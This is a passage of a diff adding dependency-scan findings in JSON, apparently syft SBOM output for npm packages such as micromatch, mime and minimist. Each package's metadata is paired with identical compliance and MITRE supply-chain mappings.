organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b81185034826e168", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: merge2 1.4.1", + "title": "merge2 1.4.1", + "description": "Package discovered: merge2 1.4.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "49cc3c07a1505404", + "name": "merge2", + "version": "1.4.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:merge2:merge2:1.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/merge2@1.4.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz", + "integrity": "sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b23a5664e0d696ec", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: methods 1.1.2", + "title": "methods 1.1.2", + "description": "Package discovered: methods 1.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a17abee1ae67ac79", + "name": "methods", + "version": "1.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:methods:methods:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/methods@1.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/methods/-/methods-1.1.2.tgz", + "integrity": "sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e5492a26182452ae", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: micromatch 4.0.8", + "title": "micromatch 4.0.8", + "description": "Package discovered: micromatch 4.0.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "dc31731ddf283ca7", + "name": "micromatch", + "version": "4.0.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jonschlinkert:micromatch:4.0.8:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/micromatch@4.0.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "dependencies": { + "braces": "^3.0.3", + "picomatch": "^2.3.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "cdd82acabfa8e9e8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: mime 1.6.0", + "title": "mime 1.6.0", + "description": "Package discovered: mime 1.6.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "10b23cab35239c6d", + "name": "mime", + "version": "1.6.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:mime_project:mime:1.6.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/mime@1.6.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a724fe9397f99c40", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: mime 3.0.0", + "title": "mime 3.0.0", + "description": "Package discovered: mime 3.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "438a12c55a1c15bf", + "name": "mime", + "version": "3.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:mime_project:mime:3.0.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/mime@3.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/mime/-/mime-3.0.0.tgz", + "integrity": "sha512-jSCU7/VB1loIWBZe14aEYHU/+1UMEHoaO7qxCOVJOw9GgH72VAWppxNcjU+x9a2k3GSIBXNKxXQFqRvvZ7vr3A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1454de8382f97ba2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: mime-db 1.52.0", + "title": "mime-db 1.52.0", + "description": "Package discovered: mime-db 1.52.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e010d1b3c9ab0c02", + "name": "mime-db", + "version": "1.52.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:mime-db:mime-db:1.52.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime-db:mime_db:1.52.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime_db:mime-db:1.52.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime_db:mime_db:1.52.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime:mime-db:1.52.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime:mime_db:1.52.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/mime-db@1.52.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c62c037f2c05a588", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: mime-types 2.1.35", + "title": "mime-types 2.1.35", + "description": "Package discovered: mime-types 2.1.35", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d035c2d2cba76761", + "name": "mime-types", + "version": "2.1.35", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:mime-types:mime-types:2.1.35:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime-types:mime_types:2.1.35:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime_types:mime-types:2.1.35:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime_types:mime_types:2.1.35:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime:mime-types:2.1.35:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:mime:mime_types:2.1.35:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/mime-types@2.1.35", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", + "dependencies": { + "mime-db": "1.52.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "39275c688371843a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: minimatch 9.0.9", + "title": "minimatch 9.0.9", + "description": "Package discovered: minimatch 9.0.9", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "dadb042585b0fc99", + "name": "minimatch", + "version": "9.0.9", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:minimatch_project:minimatch:9.0.9:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/minimatch@9.0.9", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz", + "integrity": "sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==", + "dependencies": { + "brace-expansion": "^2.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fe3ea9bf939aec06", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: minimist 1.2.8", + "title": "minimist 1.2.8", + "description": "Package discovered: minimist 1.2.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bf8bc4c7577fa757", + "name": "minimist", + "version": "1.2.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:minimist:minimist:1.2.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/minimist@1.2.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 